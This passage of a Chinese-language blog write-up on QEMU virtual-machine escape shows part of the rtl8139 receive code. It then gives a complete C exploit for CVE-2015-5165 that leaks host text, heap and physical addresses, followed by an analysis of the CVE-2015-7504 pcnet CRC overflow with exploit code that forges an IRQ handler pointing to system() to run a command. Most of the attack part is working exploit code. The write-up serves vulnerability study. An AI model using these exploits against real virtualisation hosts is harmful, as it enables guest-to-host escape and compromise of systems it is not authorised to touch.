++s->tally_counters.RxERR;
++s->tally_counters.MissPkt;

rtl8139_update_irq(s);
return size_;
}

uint32_t rx_space = rxdw0 & CP_RX_BUFFER_SIZE_MASK;

/* write VLAN info to descriptor variables. */
if (s->CpCmd & CPlusRxVLAN &&
lduw_be_p(&buf[ETH_ALEN * 2]) == ETH_P_VLAN) {
dot1q_buf = &buf[ETH_ALEN * 2];
size -= VLAN_HLEN;
/* if too small buffer, use the tailroom added duing expansion */
if (size < MIN_BUF_SIZE) {
size = MIN_BUF_SIZE;
}

rxdw1 &= ~CP_RX_VLAN_TAG_MASK;
/* BE + ~le_to_cpu()~ + cpu_to_le() = BE */
rxdw1 |= CP_RX_TAVA | lduw_le_p(&dot1q_buf[ETHER_TYPE_LEN]);

DPRINTF("C+ Rx mode : extracted vlan tag with tci: ""%u\n",
lduw_be_p(&dot1q_buf[ETHER_TYPE_LEN]));
} else {
/* reset VLAN tag flag */
rxdw1 &= ~CP_RX_TAVA;
}

/* TODO: scatter the packet over available receive ring descriptors space */

if (size+4 > rx_space)
{
DPRINTF("C+ Rx mode : descriptor %d size %d received %zu + 4\n",
descriptor, rx_space, size);

s->IntrStatus |= RxOverflow;
++s->RxMissed;

/* update tally counter */
++s->tally_counters.RxERR;
++s->tally_counters.MissPkt;

rtl8139_update_irq(s);
return size_;
}

dma_addr_t rx_addr = rtl8139_addr64(rxbufLO, rxbufHI);

/* receive/copy to target memory */
if (dot1q_buf) {
pci_dma_write(d, rx_addr, buf, 2 * ETH_ALEN);
pci_dma_write(d, rx_addr + 2 * ETH_ALEN,
buf + 2 * ETH_ALEN + VLAN_HLEN,
size - 2 * ETH_ALEN);
} else {
pci_dma_write(d, rx_addr, buf, size);
}

if (s->CpCmd & CPlusRxChkSum)
{
/* do some packet checksumming */
}

/* write checksum */
val = cpu_to_le32(crc32(0, buf, size_));
pci_dma_write(d, rx_addr+size, (uint8_t *)&val, 4);

/* first segment of received packet flag */
#define CP_RX_STATUS_FS (1<<29)
/* last segment of received packet flag */
#define CP_RX_STATUS_LS (1<<28)
/* multicast packet flag */
#define CP_RX_STATUS_MAR (1<<26)
/* physical-matching packet flag */
#define CP_RX_STATUS_PAM (1<<25)
/* broadcast packet flag */
#define CP_RX_STATUS_BAR (1<<24)
/* runt packet flag */
#define CP_RX_STATUS_RUNT (1<<19)
/* crc error flag */
#define CP_RX_STATUS_CRC (1<<18)
/* IP checksum error flag */
#define CP_RX_STATUS_IPF (1<<15)
/* UDP checksum error flag */
#define CP_RX_STATUS_UDPF (1<<14)
/* TCP checksum error flag */
#define CP_RX_STATUS_TCPF (1<<13)

/* transfer ownership to target */
rxdw0 &= ~CP_RX_OWN;

/* set first segment bit */
rxdw0 |= CP_RX_STATUS_FS;

/* set last segment bit */
rxdw0 |= CP_RX_STATUS_LS;

/* set received packet type flags */
if (packet_header & RxBroadcast)
rxdw0 |= CP_RX_STATUS_BAR;
if (packet_header & RxMulticast)
rxdw0 |= CP_RX_STATUS_MAR;
if (packet_header & RxPhysical)
rxdw0 |= CP_RX_STATUS_PAM;

/* set received size */
rxdw0 &= ~CP_RX_BUFFER_SIZE_MASK;
rxdw0 |= (size+4);

/* update ring data */
val = cpu_to_le32(rxdw0);
pci_dma_write(d, cplus_rx_ring_desc, (uint8_t *)&val, 4);
val = cpu_to_le32(rxdw1);
pci_dma_write(d, cplus_rx_ring_desc+4, (uint8_t *)&val, 4);

/* update tally counter */
++s->tally_counters.RxOk;

/* seek to next Rx descriptor */
if (rxdw0 & CP_RX_EOR)
{
s->currCPlusRxDesc = 0;
}
else
{
++s->currCPlusRxDesc;
}

DPRINTF("done C+ Rx mode ----------------\n");

}
else
{
DPRINTF("in ring Rx mode ================\n");

/* begin ring receiver mode */
int avail = MOD2(s->RxBufferSize + s->RxBufPtr - s->RxBufAddr, s->RxBufferSize);

/* if receiver buffer is empty then avail == 0 */

#define RX_ALIGN(x) (((x) + 3) & ~0x3)

if (avail != 0 && RX_ALIGN(size + 8) >= avail)
{
DPRINTF("rx overflow: rx buffer length %d head 0x%04x "
"read 0x%04x === available 0x%04x need 0x%04zx\n",
s->RxBufferSize, s->RxBufAddr, s->RxBufPtr, avail, size + 8);

s->IntrStatus |= RxOverflow;
++s->RxMissed;
rtl8139_update_irq(s);
return 0;
}

packet_header |= RxStatusOK;

packet_header |= (((size+4) << 16) & 0xffff0000);

/* write header */
uint32_t val = cpu_to_le32(packet_header);

rtl8139_write_buffer(s, (uint8_t *)&val, 4);

rtl8139_write_buffer(s, buf, size);

/* write checksum */
val = cpu_to_le32(crc32(0, buf, size));
rtl8139_write_buffer(s, (uint8_t *)&val, 4);

/* correct buffer write pointer */
s->RxBufAddr = MOD2(RX_ALIGN(s->RxBufAddr), s->RxBufferSize);

/* now we can signal we have received something */

DPRINTF("received: rx buffer length %d head 0x%04x read 0x%04x\n",
s->RxBufferSize, s->RxBufAddr, s->RxBufPtr);
}

s->IntrStatus |= RxOK;

if (do_interrupt)
{
rtl8139_update_irq(s);
}

return size_;
}

最后的exp如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
#include <sys/io.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>

int fd;

#define RTL8139 0xc000

#define ETH_HLEN 14
#define ETH_MTU 1500

#define MAX 44

#define PAGE_SIZE 0x1000
/* w0 ownership flag */
#define CP_TX_OWN (1<<31)
/* w0 end of ring flag */
#define CP_TX_EOR (1<<30)
/* first segment of received packet flag */
#define CP_TX_FS (1<<29)
/* last segment of received packet flag */
#define CP_TX_LS (1<<28)
/* large send packet flag */
#define CP_TX_LGSEN (1<<27)
/* large send MSS mask, bits 16...25 */
#define CP_TC_LGSEN_MSS_MASK ((1 << 12) - 1)

/* IP checksum offload flag */
#define CP_TX_IPCS (1<<18)
/* UDP checksum offload flag */
#define CP_TX_UDPCS (1<<17)
/* TCP checksum offload flag */
#define CP_TX_TCPCS (1<<16)

/* w0 bits 0...15 : buffer size */
#define CP_TX_BUFFER_SIZE (1<<16)
#define CP_TX_BUFFER_SIZE_MASK (CP_TX_BUFFER_SIZE - 1)
/* w1 add tag flag */
#define CP_TX_TAGC (1<<17)
/* w1 bits 0...15 : VLAN tag (big endian) */
#define CP_TX_VLAN_TAG_MASK ((1<<16) - 1)
/* w2 low 32bit of Rx buffer ptr */
/* w3 high 32bit of Rx buffer ptr */

/* set after transmission */
/* FIFO underrun flag */
#define CP_TX_STATUS_UNF (1<<25)
/* transmit error summary flag, valid if set any of three below */
#define CP_TX_STATUS_TES (1<<23)
/* out-of-window collision flag */
#define CP_TX_STATUS_OWC (1<<22)
/* link failure flag */
#define CP_TX_STATUS_LNKF (1<<21)
/* excessive collisions flag */
#define CP_TX_STATUS_EXC (1<<20)

#define CP_RX_EOR (1<<30)
#define CP_RX_OWN (1<<31)

#define CP_RX_BUFFER_SIZE_MASK ((1<<13) - 1)
#define USHRT_MAX 65535
enum RTL_8139_tx_config_bits {
TxLoopBack = (1 << 18) | (1 << 17), /* enable loopback test mode */
/*...*/
};

enum RTL_8139_rx_mode_bits {
AcceptErr = 0x20,
AcceptRunt = 0x10,
AcceptBroadcast = 0x08,
AcceptMulticast = 0x04,
AcceptMyPhys = 0x02,
AcceptAllPhys = 0x01,
Wrap = 0x80,
MxDMA256 = 0x400,
RbLen64 = 0x1800,
RxFTh512 = 0xa000,
};
enum RTL8139_registers {
MAC0 = 0, /* Ethernet hardware address. */
MAR0 = 8, /* Multicast filter. */
TxStatus0 = 0x10,/* Transmit status (Four 32bit registers). C mode only */
/* Dump Tally Conter control register(64bit). C+ mode only */
TxAddr0 = 0x20, /* Tx descriptors (also four 32bit). */
RxBuf = 0x30,
ChipCmd = 0x37,
RxBufPtr = 0x38,
RxBufAddr = 0x3A,
IntrMask = 0x3C,
IntrStatus = 0x3E,
TxConfig = 0x40,
RxConfig = 0x44,
Timer = 0x48, /* A general-purpose counter. */
RxMissed = 0x4C, /* 24 bits valid, write clears. */
Cfg9346 = 0x50,
Config0 = 0x51,
Config1 = 0x52,
FlashReg = 0x54,
MediaStatus = 0x58,
Config3 = 0x59,
Config4 = 0x5A, /* absent on RTL-8139A */
HltClk = 0x5B,
MultiIntr = 0x5C,
PCIRevisionID = 0x5E,
TxSummary = 0x60, /* TSAD register. Transmit Status of All Descriptors*/
BasicModeCtrl = 0x62,
BasicModeStatus = 0x64,
NWayAdvert = 0x66,
NWayLPAR = 0x68,
NWayExpansion = 0x6A,
/* Undocumented registers, but required for proper operation. */
FIFOTMS = 0x70, /* FIFO Control and test. */
CSCR = 0x74, /* Chip Status and Configuration Register. */
PARA78 = 0x78,
PARA7c = 0x7c, /* Magic transceiver parameter register. */
Config5 = 0xD8, /* absent on RTL-8139A */
/* C+ mode */
TxPoll = 0xD9, /* Tell chip to check Tx descriptors for work */
RxMaxSize = 0xDA, /* Max size of an Rx packet (8169 only) */
CpCmd = 0xE0, /* C+ Command register (C+ mode only) */
IntrMitigate = 0xE2, /* rx/tx interrupt mitigation control */
RxRingAddrLO = 0xE4, /* 64-bit start addr of Rx ring */
RxRingAddrHI = 0xE8, /* 64-bit start addr of Rx ring */
TxThresh = 0xEC, /* Early Tx threshold */
};

enum ChipCmdBits {
CmdReset = 0x10,
CmdRxEnb = 0x08,
CmdTxEnb = 0x04,
RxBufEmpty = 0x01,
};

/* C+ mode */
enum CplusCmdBits {
CPlusRxVLAN = 0x0040, /* enable receive VLAN detagging */
CPlusRxChkSum = 0x0020, /* enable receive checksum offloading */
CPlusRxEnb = 0x0002,
CPlusTxEnb = 0x0001,
};

struct cplus_desc
{
uint32_t dw0;
uint32_t dw1;
uint32_t bufLO;
uint32_t bufHI;
};
struct ring
{
struct cplus_desc * desc;
void * buf;
};
static uint8_t rtl8139_packet [] = {
0x52, 0x54, 0x00, 0x12, 0x34, 0x56, 0x52, 0x54, 0x00, 0x12, 0x34,
0x56, 0x08, 0x00, 0x45, 0x00, 0x00, 0x13, 0xde, 0xad, 0x40, 0x00,
0x40, 0x06, 0xde, 0xad, 0xc0, 0x08, 0x01, 0x01, 0xc0, 0xa8, 0x01,
0x02, 0xde, 0xad, 0xbe, 0xef, 0xca, 0xfe, 0xba, 0xbe, 0xca, 0xfe,
0xba, 0xbe, 0x50, 0x10, 0xde, 0xad, 0xde, 0xad, 0x66, 0x6c ,0x61,
0x67
};

uint32_t v2p(void * addr)
{
uint32_t index = (uint64_t)addr / PAGE_SIZE;
lseek(fd,index * 8,SEEK_SET);
uint64_t num = 0;
read(fd,&num,8);
return ((num & (((uint64_t)1 << 55) - 1)) << 12) + (uint64_t)addr % PAGE_SIZE;

}

void cfgtx(struct cplus_desc * addr,char * buf)
{
addr->dw0 |= CP_TX_OWN|CP_TX_EOR|CP_TX_LS|CP_TX_IPCS|CP_TX_LGSEN;
addr->dw0 += ETH_MTU + ETH_HLEN;
addr->bufLO = v2p(buf);
uint32_t paddr = v2p(addr);
outl(paddr,RTL8139 + TxAddr0);
outl(0,RTL8139 + TxAddr0 + 4);
}
void cfgrx(void ** rx_ptr,struct cplus_desc * buf)
{
int i;
uint32_t addr;
for(i = 0;i < MAX; i++)
{

void * p = malloc(1514);
rx_ptr[i] = p;
addr = (uint32_t)v2p(p);

buf[i].dw0 |= CP_RX_OWN;
if (i == MAX - 1)
buf[i].dw0 |= CP_RX_EOR;
buf[i].dw0 &= ~CP_RX_BUFFER_SIZE_MASK;
buf[i].dw0 |= USHRT_MAX;
buf[i].bufLO = addr;

}
uint32_t paddr = v2p(buf);
outl(paddr,RTL8139 + RxRingAddrLO);
outl(0,RTL8139 + RxRingAddrHI);
}

void send(void * buf,void * data,int len)
{
memcpy(buf, data, len);
outb((1 << 6), RTL8139+ TxPoll);
}

// void xxd(void *ptr, size_t size)
// {
// size_t i;
// for (i = 0; i < size; i++) {
// if (i % 16 == 0) printf("\n0x%016x: ", ptr+i);
// printf("%02x", *(uint8_t *)(ptr+i));
// if (i % 16 != 0 && i % 2 == 1) printf(" ");
// }
// printf("\n");
// }
uint64_t findText(void * ptr,size_t size)
{
uint64_t text_offset[6] = {0xf0650,0x36d0dd,0x36d1fc,0xf01a0,0x8ee100,0x161a850};
uint64_t TEXT = 0;
size_t i,j;
char flag = 0;
for(i = 0;i < size; i+=8)
{
uint64_t value = *(uint64_t *)(ptr + i);
if((value!= 0) && ((value & 0xff00000000000000) == 0))
{
if((value >> 44) == 5)
{
for(j = 0;j < 6;j++)
{
if(((value - text_offset[j]) & 0xfff) == 0)
{
flag = 1;
TEXT = value - text_offset[j];
}
}
}
}
if(flag)
{
printf("TEXT: 0x%llx\n",TEXT);
return TEXT;
}
}
return 0;
}

uint64_t findHeap(void * ptr,size_t size)
{
uint64_t heap_offset[9] = {0x574b0,0x1130a0,0xecd3d0,0xc2ac0,0x46850,0xc6ac8,0x13a508,0x13a600,0xd50258};
uint64_t HEAP = 0;
size_t i,j;
char flag = 0;
for(i = 0;i < size; i+=8)
{
uint64_t value = *(uint64_t *)(ptr + i);
if((value!= 0) && ((value & 0xff00000000000000) == 0))
{
if((value >> 44) == 5)
{
for(j = 0;j < 9;j++)
{
if(((value - heap_offset[j]) & 0xfff) == 0)
{
flag = 1;
HEAP = value - heap_offset[j];
}
}
}
}
if(flag)
{
printf("HEAP: 0x%llx\n",HEAP);
return HEAP;
}
}
return 0;
}


uint64_t findPhy(void * ptr,size_t size)
{
uint64_t PHY = 0;
size_t i,j;
char flag = 0;
for(i = 0;i < size; i+=8)
{
uint64_t value = *(uint64_t *)(ptr + i);
if((value!= 0) && ((value & 0xff00000000000000) == 0))
{

if((value & 0xff0000000000) == 0x7f0000000000)
{
value &= 0xffffffffff000000;
value -= 0x80000000;
PHY = value;
flag = 1;

}
}
if(flag)
{
printf("PHY: 0x%llx\n",PHY);
return PHY;
}
}
return 0;
}


int main()
{
uint64_t PHY = 0,HEAP = 0,TEXT = 0;
fd = open("/proc/self/pagemap",O_RDONLY);
iopl(3);
outb(CmdTxEnb|CmdRxEnb,RTL8139 + ChipCmd);
outw(CPlusTxEnb|CPlusRxEnb,RTL8139 + CpCmd);
outl(TxLoopBack, RTL8139 + TxConfig);
outl(AcceptMyPhys, RTL8139 + RxConfig);

struct cplus_desc * tx_addr = malloc(sizeof(struct cplus_desc));
memset(tx_addr,0,sizeof(struct cplus_desc));

void * tx_buf = malloc(ETH_HLEN + ETH_MTU);
memset(tx_buf,0,ETH_HLEN + ETH_MTU);



void ** rx_ptr = malloc(8 * MAX);

void * rx_buf = malloc(sizeof(struct cplus_desc) * MAX);

memset(rx_buf,0,sizeof(struct cplus_desc) * MAX);


cfgtx(tx_addr,tx_buf);
cfgrx(rx_ptr,rx_buf);

send(tx_buf, rtl8139_packet,sizeof(rtl8139_packet));
sleep(1);
int i;

for (i = 0; i < MAX; i++)
{
PHY = findPhy(rx_ptr[i], 1514);
if(PHY) break;
}
for (i = 0; i < MAX; i++)
{
TEXT = findText(rx_ptr[i], 1514);
if(TEXT) break;
}
for (i = 0; i < MAX; i++)
{
HEAP = findHeap(rx_ptr[i], 1514);
if(HEAP) break;
}
return 0;

}

CVE-2015-7504

cve-2015-7504漏洞存在于hw/net/pcnet.c的pcnet_receive()函数中,漏洞出现在对于数据包的crc校验计算中

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
if (!s->looptest) {
memcpy(src, buf, size);
/* no need to compute the CRC */
src[size] = 0;
src[size + 1] = 0;
src[size + 2] = 0;
src[size + 3] = 0;
size += 4;
} else if (s->looptest == PCNET_LOOPTEST_CRC ||
!CSR_DXMTFCS(s) || size < MIN_BUF_SIZE+4) {
uint32_t fcs = ~0;
uint8_t *p = src;

while (p != &src[size])
CRC(fcs, *p++);
*(uint32_t *)p = htonl(fcs);
size += 4;
} else {
uint32_t fcs = ~0;
uint8_t *p = src;

while (p != &src[size-4])
CRC(fcs, *p++);
crc_err = (*(uint32_t *)p != htonl(fcs));
}

在crc的计算时,没有对size进行检测,就把crc后的结果加到了buffer后面,而buffer处在:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
struct PCNetState_st {
NICState *nic;
NICConf conf;
QEMUTimer *poll_timer;
int rap, isr, lnkst;
uint32_t rdra, tdra;
uint8_t prom[16];
uint16_t csr[128];
uint16_t bcr[32];
int xmit_pos;
uint64_t timer;
MemoryRegion mmio;
uint8_t buffer[4096];
qemu_irq irq;
void (*phys_mem_read)(void *dma_opaque, hwaddr addr,
uint8_t *buf, int len, int do_bswap);
void (*phys_mem_write)(void *dma_opaque, hwaddr addr,
uint8_t *buf, int len, int do_bswap);
void *dma_opaque;
int tx_busy;
int looptest;
};

可以看到buffer的大小为4096,在pcnet_receive的上层函数中,限制了size的大小小于等于4096

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
if (s->xmit_pos + bcnt > sizeof(s->buffer)) {
s->xmit_pos = -1;
goto txdone;
}

s->phys_mem_read(s->dma_opaque, PHYSADDR(s, tmd.tbadr),
s->buffer + s->xmit_pos, bcnt, CSR_BSWP(s));
s->xmit_pos += bcnt;

if (!GET_FIELD(tmd.status, TMDS, ENP)) {
goto txdone;
}

#ifdef PCNET_DEBUG
printf("pcnet_transmit size=%d\n", s->xmit_pos);
#endif
if (CSR_LOOP(s)) {
if (BCR_SWSTYLE(s) == 1)
add_crc = !GET_FIELD(tmd.status, TMDS, NOFCS);
s->looptest = add_crc ? PCNET_LOOPTEST_CRC : PCNET_LOOPTEST_NOCRC;
pcnet_receive(qemu_get_queue(s->nic), s->buffer, s->xmit_pos);

可以看到s->xmit_pos + bcnt > 4096, s->xmit_pos += bcnt;这里可以看到size为4096,当size为4096的时候,我们恰好可以溢出四个字节,可以看到结构体的相邻buffer的是一根指针qemu_irq irq,我们可以看到这个指针的定义

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
typedef struct IRQState *qemu_irq;

struct IRQState {
Object parent_obj;

qemu_irq_handler handler;
void *opaque;
int n;
};

void qemu_set_irq(qemu_irq irq, int level)
{
if (!irq)
return;

irq->handler(irq->opaque, irq->n, level);
}

可以看到指针指向IRQState结构体,而在qemu_set_irq中有这样一步操作:irq->handler().而在pcnet_update_irq(PCNetState *s)函数中,会调用qemu_set_irq函数.也就是我们可以通过控制这个指针,覆盖指向到一个我们伪造好的结构体中,就可以控制rip.

b hw/net/pcnet.c:1005,print s,我们可以看到PCNetState结构体处于heap区域,而在我们只能覆盖irq指针的低4字节,所以我们只能采用堆内存伪造的方法,而我们可以进行操作的堆内存,很明显就是s.buffer[4096]

但是我们最多只能leak heapbase,这个s的结构体怎么拿到呢,qemu在启动的过程中,他的堆块申请释放顺序都是一样的,所以这个s的偏移也是固定的,通过调试,可以看到在本机上的结构体的偏移为0x67e1b0

堆块伪造:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
scanf("%llx",&heapBaseAddr);
scanf("%llx",&textBaseAddr);
uint64_t *packet_ptr;
packet_ptr = pcnet_packet;
struct fake_irq * irq_ptr = (packet_ptr + 0x10);

irq_ptr->handler = system_plt + textBaseAddr;
irq_ptr->op = heapBaseAddr + 0x67e1b0 + 0x2290 + 0x1f*0x8;
*(packet_ptr + 0x1f) = 7449354444534473059; //cat flag
*(packet_ptr + 0x20) = 0;
*(packet_ptr + 0x21) = 0;

iopl(3);

...

/* compute required crc */
ptr = pcnet_packet;
while (ptr != &pcnet_packet[PCNET_BUFFER_SIZE - 4])
CRC(fcs, *ptr++);

targetValue = (heapBaseAddr + 0x67e1b0 + 0x2290 + 0x10*8) & 0xffffffff;

可以看到已经将fake_irq写入内存

执行命令cat flag

CATALOG
  1. 1. QEMU
  2. 2. 分析目的
  3. 3. 环境搭建
    1. 3.1. qemu调试方法
    2. 3.2. 网络配置
  4. 4. 漏洞分析
    1. 4.1. cve-2015-5165
    2. 4.2. exp编写
    3. 4.3. CVE-2015-7504